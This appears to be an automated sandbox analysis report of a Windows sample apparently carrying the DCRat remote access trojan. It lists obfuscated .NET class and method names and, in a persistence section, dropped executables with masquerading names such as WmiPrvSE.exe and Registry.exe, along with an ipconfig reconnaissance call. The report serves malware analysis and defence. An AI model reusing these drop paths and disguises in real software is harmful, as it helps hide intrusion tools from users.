Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, Mx5jrE9Dv7HWFBNG5m.cs	High entropy of concatenated method names: 'iJnFQioWi', 'SS9UqAHISt9h90WMgABl', 'yub83rHIYc17WlbQ4YnT', 'CWoRWZHIexoNIRwIlqBa', 'tlTbycHIQ2Vj47lsxcTl', 'hloyayxTQ', 'koFCOfGIu', 'qMck3lMqo', 'TJdKASW9M', 'VajGWpJ99'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, plL30BWGnoj9CjpuNR7.cs	High entropy of concatenated method names: 'fc5ygQxRiZ', 'preyjew2J7', 'f7qSGwH41vNQMJ5KolYk', 'RfNc4GH4JRlNnn5hLRev', 'vvPxSMH43hWTDnIjGWrj', 'BQgLoNH4EKCa5BtSmcHQ', 'IdsniNH4MnvyNhpte1uL', 'DUlyyTtx47', 'gNH9ClH4m68GJ1XHBj3t', 'zfB842H40HkET3Kp9nQR'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, UOGrmKFmIYuJHObVGSI.cs	High entropy of concatenated method names: 'zHVlKcHcOrtdOvHJXf2T', 'lMD5JWH0w3rUotVL9xSS', 'Ywx6rDH0zXTl2DiKcti5', 'iddFc6MF1Y', 'Mh9', 'method_0', 'bllFhGhkUi', 'yijFsvBBs5', 'kovFtoQyns', 'iPVFuMdiVj'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, Tqt5M2NyePVGYZYlZS5.cs	High entropy of concatenated method names: 'FwvNQmC1gR', 'BZwdD9Hfdi3xWgSArrhh', 'VFxQlTHfJYIwalSUBYhF', 'R25iMFHfV2OeDxOTRV9U', 'JbNPINHf5Sjv4RM7LKBp', 'RKFEUcHf3jfDaGM7xOSJ', 'VgfNkDoQwd', 'jxINK0nAyc', 'PYyNGtP9n6', 'buONPrwpOg'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, iSjaOLLKPfRDewOasZn.cs	High entropy of concatenated method names: 'CATLPV9g6r', 'EYrCK0HFVCGvJdvRqIHM', 'js9EbxHF5d7xP5ca4tuR', 'bQ6uh5HFdcWhV7gp9dFV', 'D72iSpHFJttrAgMjeeDS', 'rqCKiyHFnk1VUiih4nJ4', 'WVAhHyHF4sHT9qcGkQXR', 'I3LIW1HF39oWAIanWVgN'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, mJ7igxxm23x2OUDOWNG.cs	High entropy of concatenated method names: 'D84pxN13tJ', 'pFpppTKEyZ', 'SE2pa8gfUg', 'XhT2esHSwY5kwREysjBq', 'A6egl5HSi1JCZwvMccP8', 'GShLYLHSbh2nb9jQkegb', 'fGsplPfeBN', 'EwmF8EHY2TLrSGsNB0qC', 'O4RMVLHYOSM9k1it6Yq4', 'D3RrW3HYHGtpLpunqlEI'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, OWJKhnpyowAphB6akvt.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'MvjHL2mdoZy', 'vTDHpHK1kwq', 'CcbIfZHYjHK17TEnICPa', 'nQXX97HYWDo58qtTbhQN', 'tp3U9EHYBkN05m0n22Uc', 'yj3roxHYro88oTJehEr3', 'wDU4UlHY9VfGKSBB3mAR'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, hwblA2kBDSZW2uY75W5.cs	High entropy of concatenated method names: 'S5oZidHdg642PPck2f05', 'kRg18gHdj16eILJF60iD', 'yKtBrrHdWSrPK9Degxt0', 'shxpPhHdlMWavr2Y4vgl', 'P7Wl0OHdqcxHklOEJjYS', 'method_0', 'method_1', 'z1Zk90nPgB', 'BoxkTVd5Hm', 'mw9kyU7rBO'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, cruYcl4urNHsj18q3kx.cs	High entropy of concatenated method names: 'qcQ4b8i0kj', 'BlW4wTE9sg', 'K5J4zTZBM0', 'pYDVOn3ymR', 'yN4VHPs39r', 'pIyV28uxH0', 'WilVxjUnlN', 'oCTVpxF7yi', 'uTjVauOVxq', 'xPpVUcA59P'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, exM9PHhAxTpBcUDmy1B.cs	High entropy of concatenated method names: 'C39HLImqe39', 'cdQHU69BTtp', 'I22UK8HulaL4u511Wt65', 'o90AtQHu8fQk1CIJ97kZ', 'dLGGjZHuRQo3rKJGUkFd', 'Nx7QbQHuqPC01SvoMo7P', 'GXiWicHuBlV5AHjuU0mZ', 'XqO7MgHujyNwvhVgwLOk', 'I3D8GtHuWTAMd7TGAb8r', 'imethod_0'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, PO3HXuLetEHg8PHtv52.cs	High entropy of concatenated method names: 'YALLSV1Xv7', 'o4ULYyByDY', 'mgaLZSGkSP', 'Up1L7ydb16', 'KblLfArb4t', 'Nh9LFSGnLe', 'MHhmTBHFc181fT548mKb', 'hcOcmOHFhYS3IaMvmkE8', 'ewBEHUHFsRkGWiqkuO0I', 'iqq800HFtnTGduiMMFMZ'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, s5wkfYb46Eorf0no8kh.cs	High entropy of concatenated method names: 'w1aHU7e9P6J', 'PKQHUfkJwXu', 'OSDHUF1usDM', 'BPnHUvHi9ZQ', 'QITHUoB4Yls', 'Dd5HUA0OSg1', 'SXLHUnHW1IA', 'zYqwaj8gPJ', 'tktHU4sFoKe', 'MaeHUVMx9EG'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, Dufp9HfvTfgH65WwmsD.cs	High entropy of concatenated method names: 'Close', 'qL6', 'aR5fAy5oOa', 'gMwfnoagJZ', 'GFgf49rtu9', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, kgrkpms74mdnP6fu234.cs	High entropy of concatenated method names: 'jZNsFNGJSb', 'CmIsvGhuOl', 'yQ1soPqHi1', 'x9msAbxqsy', 'RY1sn57bKp', 'LJKs4CEl9g', 'L4QsV0XWDl', 'ONys5NRaUE', 'jPGsdN9G1K', 'VtksJNqGiC'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, RsmSbr6PgpqK6du6OuZ.cs	High entropy of concatenated method names: 'nwi66iILkM', 'zlZ6IqZhE5', 'Nmb6ea2OBN', 'kKx6QPrrHo', 'b7f6S2cWcF', 'FineDxH3dgKih6VI7cej', 'axEulTH3VNQykDSmqdDb', 'o7YUuyH35EGE7c0lKly4', 'zacL6RH3JtxmFOTIwVD4', 'HkXfbpH33XjrGhubpoeM'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, sthVylNZxK2pLlk4lwj.cs	High entropy of concatenated method names: 'tw4NfSVgee', 'AD2NFekNQZ', 'CukPJxHfDoQgHwqYXgOn', 'jZ2lAeHfEnK3DTrdneAA', 'WQ02maHfMdyyy9tgTvBw', 'UZxHeEHfm0iube2ULAeR', 'inxBFcHf0s3Yrasbq0eP', 'Rehe70Hfcy5clloy8JP2', 'TgOfSBHfhavX211PqYSK', 'cHk7h9Hfs0sIqtsTKBHw'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, xX0DqmN5PgvUGXw20Er.cs	High entropy of concatenated method names: 'fugNtjStTP', 'Ar6NuQJqfF', 'qIh4otHFLRlwYDrT4Ube', 'O9br6QHFUUAFd3XB14FW', 'XIv0QHHFNJGYFDM9ZCdv', 'bA2eOpHF8K6j3cueuLrd', 'VdlNJ5c3Nb', 'O58N3JFDbr', 'jq5N1dxKrC', 'OC0NE9JpC7'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, nTOR0QkaCsrPIbuxsDc.cs	High entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'PGAkNAdqhk', 'vmethod_0', 'eUdkL6ThB8', 'vfPHLkWhTqO', 'dBjlTiH5MN6wUWuaGP56', 'iLR5c4H51U0NBkL3TBH8', 'u5j5YQH5EgYrSqJ87cVI'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, J7EMJcXJsUD5YajAk9q.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'AV4X1ejO3U', 'oBqXEF738P', 'Dispose', 'D31', 'wNK'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, DmcWucu9ZjDuseHj6np.cs	High entropy of concatenated method names: 'PTW4itHbNuyXq4tcvXy7', 'JNq7m7HbL4jtJZ6fh4ON', 'dQ5ihAFoT0', 't0DjYNHbqSlTpG699GkB', 'egQMCdHbgEHkvPL2phYX', 'p0gmYOHbjZr4D8W3og5T', 'fea3LTHbWWMyu5TYHL7Q', 'Wu8VcjHbBiZkmpFHtFaW', 'yI7HgeHbr0AKFPqfihHa', 'UG9bi1Hb9RykODdjek5y'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, rGismKhZyjVWHY5iK6X.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'KIFhfyGnYn', 'pxxXjDHtnppyinhIcGt3', 'EflUVyHt4iIxGkMKtsTd', 'RZgr7VHtV6pSTfpj7KZk', 'Lu1ukiHt5yJ4VGGIV5Md', 'I3ubvAHtdFuceol6ifAs', 'Tj7VEtHtJFS9YlouuCL1'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, rIKPuHLR4LueBjO981D.cs	High entropy of concatenated method names: 'G1gLq5ZhOR', 'eddLgLkex0', 'hOPLjjG9V6', 'sr8adiHFku5nHuTZPob7', 'hUWQwdHFKFkMmFlx2hfs', 'XMFjSGHFyoKtQ9K8rZOr', 'seHCJ5HFCsqD4kvnHZnd', 'BPHhX6HFGvwIDs5ssaWE', 'mhqqqfHFPfckkb4bNBAV', 'F1ipt5HFXonmvJXLUCcC'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, Kt11kWQ1dPLgCREHBEB.cs	High entropy of concatenated method names: 'E6DQMADBuH', 'hMYQDG8ZEb', 'W4ZQmKaPQh', 'PprnYUHEQYvDVSAgbGrc', 'NMsUOeHEIqkrZNwd16LU', 'jwajGeHEeLLuKwxnwQSU', 'fYTIVvHESefXRUWN7Ooa', 'v9CnwAHEYaamFV5UD3R0', 'TFkAPFHEZhluwnmvC4mS', 'bH3dgXHE7rqLy215SdNE'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, psy1bBIZElcggbr41E5.cs	High entropy of concatenated method names: 'method_0', 'qJfIfvOqTl', 'PNHIFLR4tF', 'ltPIvVLGu4', 'p4YIoRupJl', 'gkQIAkZKIj', 'gVBInWugUs', 'nTGdtMH1qjFt1I8BXTdi', 'h6CSkRH1RIryE033tECy', 'm6FsEbH1llaBFd1EJq0B'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, YHuhCiNHMNDYMeQoCCZ.cs	High entropy of concatenated method names: 'q68NxmQWOg', 'DdMNppL4e4', 'TT6NabDwOH', 'lJtw4YHfpw1Z3xOSL6WL', 'vv73NRHf2ZdGZhbPGjq9', 'Pub81wHfxecw9tOJIjQr', 'BZXoyqHfaCWwQJLNLTrl', 'NpvUqCHfUv5oIJaL1sIn', 'JxMksaHfN2EtMZTIKJAA', 'Hry4sAHfLaL3Voy3UYhC'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, ynpGilbj8SbgalVBhPU.cs	High entropy of concatenated method names: 'XG22aoS2MnA', 'Kwq2aASGcpx', 'SIpH72HbnvXmaVRiYPcY', 'ljpbToHb4NP8mrClq9tk', 'tdhoEsHbVJ1qdPOxQxfx', 'wBXf35Hb5NWOtgfTouJM', 'TWtUKHHbdhmdB73saj7S'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, juNZZxQcFPpOBx5B0U2.cs	High entropy of concatenated method names: 'e39QsYM76k', 'JhPQtaTrcB', 'aXwQuxRW27', 'K42QitCiuf', 'qZ5QbNo626', 'gRZ5jIHEormgKKXL5UlZ', 'rEpyYGHEFJ9FZdShLLfK', 'uiUR1NHEvagixTkfCFnw', 'zodRiXHEAwn5Lm8ofNgg', 'svrFpDHEnOLtxhBV1rNW'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, i2sOyqYp2qn1NJDci8x.cs	High entropy of concatenated method names: 'RBZYUQdSxM', 'HqxYN6DqAE', 'kZQYLAZrsG', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'YHLY8Jc9xc'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, ewrnHVz2Em3gnCIihE.cs	High entropy of concatenated method names: 'gbwHHMfCuX', 'mmJHxAoWHD', 'kg0HpeXjvb', 'kMCHafAtFS', 'zktHU38GQD', 'ea8HNUNyWr', 'Ak9H83bKBS', 'VBYZs3HeaAvcBBBkG3wt', 'TnI1g8HeUcyihRdaGVkR', 'F2f4PXHeNtumTsjkfWgq'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, HFBlwGp78PJYe8NpwYr.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'KyvHLp4ZGvQ', 'vTDHpHK1kwq', 'dXAx5wHYQ7VnG1Z9jyGf', 'msUsbFHYS22ls24QO9d8', 'DdxRpdHYYP0bPiQDlFqG', 'eatr0cHYZvi9Iql82bXD', 'Y0QoEhHY7jUoqS3CFi4I'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, FjMrhDaJ76Hv2OSGsdQ.cs	High entropy of concatenated method names: 'wE2aDjqaRg', 'HX6NnxHZb87PYH0lJ8UW', 'OHWVWyHZusP7Wh63NLQK', 'Yx09BiHZivi2jfIUmAfn', 'oRGmTkHZw9IiylGDmIRB', 'e031dmHZz643t9ki9bqw', 'U1J', 'P9X', 'QInHpBAOZGN', 'YNyHpr8VFE7'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, jyV9ajnZDpTImApmy8G.cs	High entropy of concatenated method names: 'FgonfKL5CH', 'PlDnFchU0R', 'vOZnvVO11S', 'WHXnoCAs9j', 'J9VnAAUHaw', 'HHRnn0JLD6', 'Ffnn4xL8Yg', 'lYJnVXjjpS', 'lnMn5EDcCG', 'XaRndG3TGd'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, ExmtqdxIe3trnYjckgJ.cs	High entropy of concatenated method names: 'dCfxd8XNNB', 'TrexJDDwui', 'Oxax3NZ3w2', 'kfoPVbHS4DEZGYrXy4Ii', 'qTqOhIHSVBuux88GH3rR', 'GvYku7HSAuIPfGcYK7Fh', 'KCB0r0HSnVWDZHX8PyIN', 'uS5xQ9QBZc', 'fZExSlpVde', 'PN0xYoJQpA'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, VtM5fEovIO5FhpxvvtY.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Pib0UdHcIqUWes9IOD87', 'lre4OKHcXa9f1ehGgg1Y', 'V27cbOHc6NCD3KgE09l1'

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\ComponentReviewperfmonitor\WmiPrvSE.exe	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\AJexuQye.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	File created: C:\ComponentReviewperfmonitor\Mscrt.exe	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\mmsihreI.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\PAQlXkJO.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\OUvvQGoW.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\wAkXRBsB.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\XIYBqjjh.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\WUTtFVnj.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\XqUSVQdy.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\TaRdOVJt.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\TrGcehJI.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\pVzGKFEw.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\ASBxeDSb.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\DXuFwIar.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\oFVQTmjS.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\KjOuzKdG.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\GoOOBNnj.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\lwQiRexF.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Recovery\Registry.exe	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\TRlucpWH.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\KrxNetEL.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\yxUOovbm.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\cNwShBsX.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\tPFHKnhJ.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\JInMuEEa.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\kPeZMpiY.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\cAEKMRbo.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\SDCUsTNK.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\vDJPwBdH.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\tQRjIvxcBsFMaEOtv.exe	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\DDhNlQcT.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\rNSZpEdN.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\uMgPgnwD.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\GSwVnIEh.log	Jump to dropped file
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	File created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\GtXEsNdN.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\DuJNBeJX.log	Jump to dropped file
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	File created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\McddlGOE.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Recovery\tQRjIvxcBsFMaEOtv.exe	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\FwwvWNOS.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\EvzfQQCl.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\SedCyZmq.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\XMmLkVMA.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\ohvyYrIy.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\rvLGajjL.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\xxLgnBHw.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\peXGurXs.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\aLKjMSnc.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\nkUqDrtD.log	Jump to dropped file

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\McddlGOE.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\DuJNBeJX.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\mmsihreI.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\TaRdOVJt.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\KrxNetEL.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\AJexuQye.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\pVzGKFEw.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\XIYBqjjh.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\FwwvWNOS.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\nkUqDrtD.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\yxUOovbm.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\KjOuzKdG.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\aLKjMSnc.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\GtXEsNdN.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\ohvyYrIy.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\WUTtFVnj.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\DDhNlQcT.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\lwQiRexF.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\cNwShBsX.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\SedCyZmq.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\ASBxeDSb.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\peXGurXs.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\DXuFwIar.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\TrGcehJI.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\JInMuEEa.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\rvLGajjL.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\PAQlXkJO.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\GSwVnIEh.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\oFVQTmjS.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\OUvvQGoW.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\vDJPwBdH.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\kPeZMpiY.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\SDCUsTNK.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\rNSZpEdN.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\XqUSVQdy.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\GoOOBNnj.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\wAkXRBsB.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\tPFHKnhJ.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\xxLgnBHw.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\XMmLkVMA.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\EvzfQQCl.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\uMgPgnwD.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\cAEKMRbo.log	Jump to dropped file
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File created: C:\Users\user\Desktop\TRlucpWH.log	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
